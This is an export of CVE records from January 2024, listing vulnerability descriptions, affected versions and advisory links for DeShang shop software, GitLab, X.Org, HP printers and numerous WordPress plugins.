CVE    2024    416    Candidate    A vulnerability, which was classified as critical, has been found in DeShang DSMall up to 5.0.3. Affected by this issue is some unknown functionality of the file application/home/controller/MemberAuth.php. The manipulation of the argument file_name leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250436.    MISC:https://note.zhaoj.in/share/DxR7FZsCKJQ1   |   URL:https://note.zhaoj.in/share/DxR7FZsCKJQ1   |   MISC:https://vuldb.com/?ctiid.250436   |   URL:https://vuldb.com/?ctiid.250436   |   MISC:https://vuldb.com/?id.250436   |   URL:https://vuldb.com/?id.250436    Assigned (20240111)
CVE    2024    415    Candidate    A vulnerability classified as critical was found in DeShang DSMall up to 6.1.0. Affected by this vulnerability is an unknown functionality of the file application/home/controller/TaobaoExport.php of the component Image URL Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250435.    MISC:https://note.zhaoj.in/share/63LhFitJmKGR   |   URL:https://note.zhaoj.in/share/63LhFitJmKGR   |   MISC:https://vuldb.com/?ctiid.250435   |   URL:https://vuldb.com/?ctiid.250435   |   MISC:https://vuldb.com/?id.250435   |   URL:https://vuldb.com/?id.250435    Assigned (20240111)
CVE    2024    414    Candidate    A vulnerability classified as problematic has been found in DeShang DSCMS up to 3.1.2/7.1. Affected is an unknown function of the file public/install.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250434 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/xYQMsARg83ui   |   URL:https://note.zhaoj.in/share/xYQMsARg83ui   |   MISC:https://vuldb.com/?ctiid.250434   |   URL:https://vuldb.com/?ctiid.250434   |   MISC:https://vuldb.com/?id.250434   |   URL:https://vuldb.com/?id.250434    Assigned (20240111)
CVE    2024    413    Candidate    A vulnerability was found in DeShang DSKMS up to 3.1.2. It has been rated as problematic. This issue affects some unknown processing of the file public/install.php. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250433 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/MarH4fY66BgO   |   URL:https://note.zhaoj.in/share/MarH4fY66BgO   |   MISC:https://vuldb.com/?ctiid.250433   |   URL:https://vuldb.com/?ctiid.250433   |   MISC:https://vuldb.com/?id.250433   |   URL:https://vuldb.com/?id.250433    Assigned (20240111)
CVE    2024    412    Candidate    A vulnerability was found in DeShang DSShop up to 3.1.0. It has been declared as problematic. This vulnerability affects unknown code of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250432.    MISC:https://note.zhaoj.in/share/Q56cf5nN9RzF   |   URL:https://note.zhaoj.in/share/Q56cf5nN9RzF   |   MISC:https://vuldb.com/?ctiid.250432   |   URL:https://vuldb.com/?ctiid.250432   |   MISC:https://vuldb.com/?id.250432   |   URL:https://vuldb.com/?id.250432    Assigned (20240111)
CVE    2024    411    Candidate    A vulnerability was found in DeShang DSMall up to 6.1.0. It has been classified as problematic. This affects an unknown part of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250431.    MISC:https://note.zhaoj.in/share/9G6K6RBjS4M4   |   URL:https://note.zhaoj.in/share/9G6K6RBjS4M4   |   MISC:https://vuldb.com/?ctiid.250431   |   URL:https://vuldb.com/?ctiid.250431   |   MISC:https://vuldb.com/?id.250431   |   URL:https://vuldb.com/?id.250431    Assigned (20240111)
CVE    2024    410    Candidate    An authorization bypass vulnerability was discovered in GitLab affecting versions 15.1 prior to 16.7.6, 16.8 prior to 16.8.3, and 16.9 prior to 16.9.1. A developer could bypass CODEOWNERS approvals by creating a merge conflict.    MISC:GitLab Issue #437988   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/437988   |   MISC:HackerOne Bug Bounty Report #2296778   |   URL:https://hackerone.com/reports/2296778    Assigned (20240111)
CVE    2024    409    Candidate    A flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context.    CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0006/   |   FEDORA:FEDORA-2024-05db4bcbec   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/   |   GENTOO:GLSA-202401-30   |   URL:https://security.gentoo.org/glsa/202401-30   |   MISC:RHBZ#2257690   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257690   |   MISC:RHSA-2024:0320   |   URL:https://access.redhat.com/errata/RHSA-2024:0320   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0409   |   URL:https://access.redhat.com/security/cve/CVE-2024-0409   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3721-1] xorg-server security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html    Assigned (20240110)
CVE    2024    408    Candidate    A flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL.    CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0006/   |   FEDORA:FEDORA-2024-05db4bcbec   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/   |   GENTOO:GLSA-202401-30   |   URL:https://security.gentoo.org/glsa/202401-30   |   MISC:RHBZ#2257689   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257689   |   MISC:RHSA-2024:0320   |   URL:https://access.redhat.com/errata/RHSA-2024:0320   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0408   |   URL:https://access.redhat.com/security/cve/CVE-2024-0408   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3721-1] xorg-server security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html    Assigned (20240110)
CVE    2024    407    Candidate    Certain HP Enterprise LaserJet, and HP LaserJet Managed Printers are potentially vulnerable to information disclosure, when connections made by the device back to services enabled by some solutions may have been trusted without the appropriate CA certificate in the device's certificate store.    MISC:https://support.hp.com/us-en/document/ish_10174094-10174120-16   |   URL:https://support.hp.com/us-en/document/ish_10174094-10174120-16    Assigned (20240110)
CVE    2024    405    Candidate    The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the /wp-json/burst/v1/data/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380   |   URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380   |   MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926   |   URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve    Assigned (20240110)
CVE    2024    403    Candidate    Recipes version 1.5.10 allows arbitrary HTTP requests to be made through the server. This is possible because the application is vulnerable to SSRF.    MISC:https://fluidattacks.com/advisories/harris/   |   URL:https://fluidattacks.com/advisories/harris/   |   MISC:https://github.com/TandoorRecipes/recipes/   |   URL:https://github.com/TandoorRecipes/recipes/    Assigned (20240110)
CVE    2024    402    Candidate    An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace.    MISC:GitLab Issue #437819   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/437819   |   MISC:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/   |   URL:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/    Assigned (20240110)
CVE    2024    396    Candidate    In Progress MOVEit Transfer versions released before 2022.0.10 (14.0.10), 2022.1.11 (14.1.11), 2023.0.8 (15.0.8), 2023.1.3 (15.1.3), an input validation issue was discovered. An authenticated user can manipulate a parameter in an HTTPS transaction. The modified transaction could lead to computational errors within MOVEit Transfer and potentially result in a denial of service.    MISC:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024   |   URL:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024   |   MISC:https://www.progress.com/moveit   |   URL:https://www.progress.com/moveit    Assigned (20240110)
CVE    2024    395    Candidate    ** REJECT ** NON Security Issue.        Assigned (20240110)
CVE    2024    390    Candidate    INPRAX "iZZi connect" application on Android contains hard-coded MQTT queue credentials. The same MQTT queue is used by corresponding physical recuperation devices. Exploiting this vulnerability could potentially allow unauthorized access to manage and read parameters of the recuperation unit "reQnet iZZi". This issue affects "iZZi connect" application versions before 2024010401.    MISC:https://cert.pl/en/posts/2024/02/CVE-2024-0390/   |   URL:https://cert.pl/en/posts/2024/02/CVE-2024-0390/   |   MISC:https://cert.pl/posts/2024/02/CVE-2024-0390/   |   URL:https://cert.pl/posts/2024/02/CVE-2024-0390/    Assigned (20240110)
CVE    2024    389    Candidate    A vulnerability, which was classified as critical, was found in SourceCodester Student Attendance System 1.0. Affected is an unknown function of the file attendance_report.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250230 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing   |   URL:https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250230   |   URL:https://vuldb.com/?ctiid.250230   |   MISC:https://vuldb.com/?id.250230   |   URL:https://vuldb.com/?id.250230    Assigned (20240110)
CVE    2024    387    Candidate    The EDS-4000/G4000 Series prior to version 3.2 includes IP forwarding capabilities that users cannot deactivate. An attacker may be able to send requests to the product and have it forwarded to the target. An attacker can bypass access controls or hide the source of malicious requests.    MISC:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0   |   URL:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0    Assigned (20240110)
CVE    2024    386    Candidate    The weForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Referer' HTTP header in all versions up to, and including, 1.6.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve    Assigned (20240109)
CVE    2024    385    Candidate    The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxAddCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add categories.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve    Assigned (20240109)
CVE    2024    384    Candidate    The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Notes in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve    Assigned (20240109)
CVE    2024    382    Candidate    The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to unrestricted use of the 'header_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php   |   URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve    Assigned (20240109)
CVE    2024    381    Candidate    The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php   |   URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php   |   URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php   |   URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve    Assigned (20240109)
CVE    2024    380    Candidate    The WP Recipe Maker plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 9.1.0 via the 'icon' attribute used in Shortcodes. This makes it possible for authenticated attackers, with contributor-level access and above, to include the contents of SVG files on the server, which can be leveraged for Cross-Site Scripting.    MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php   |   URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve    Assigned (20240109)
CVE    2024    379    Candidate    The Custom Twitter Feeds – A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php   |   URL:https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve    Assigned (20240109)
CVE    2024    378    Candidate    The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve    Assigned (20240109)
CVE    2024    377    Candidate    The LifterLMS – WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_review' function in all versions up to, and including, 7.5.1. This makes it possible for unauthenticated attackers to publish an unrestricted number of reviews on the site.    MISC:https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php   |   URL:https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve    Assigned (20240109)
CVE    2024    374    Candidate    The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'create_view' function. This makes it possible for unauthenticated attackers to create views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve    Assigned (20240109)
CVE    2024    373    Candidate    The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'save_view' function. This makes it possible for unauthenticated attackers to modify arbitrary post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve    Assigned (20240109)
CVE    2024    372    Candidate    The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve    Assigned (20240109)
CVE    2024    371    Candidate    The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve    Assigned (20240109)
CVE    2024    370    Candidate    The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve    Assigned (20240109)
CVE    2024    369    Candidate    The Bulk Edit Post Titles plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulkUpdatePostTitles function in all versions up to, and including, 5.0.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.    MISC:https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130   |   URL:https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve    Assigned (20240109)
CVE    2024    368    Candidate    The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.8.3 via hardcoded API Keys. This makes it possible for unauthenticated attackers to extract sensitive data including PII.    MISC:https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api   |   URL:https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api   |   MISC:https://developers.hubspot.com/docs/api/webhooks#scopes   |   URL:https://developers.hubspot.com/docs/api/webhooks#scopes   |   MISC:https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13   |   URL:https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13   |   MISC:https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php   |   URL:https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve    Assigned (20240109)
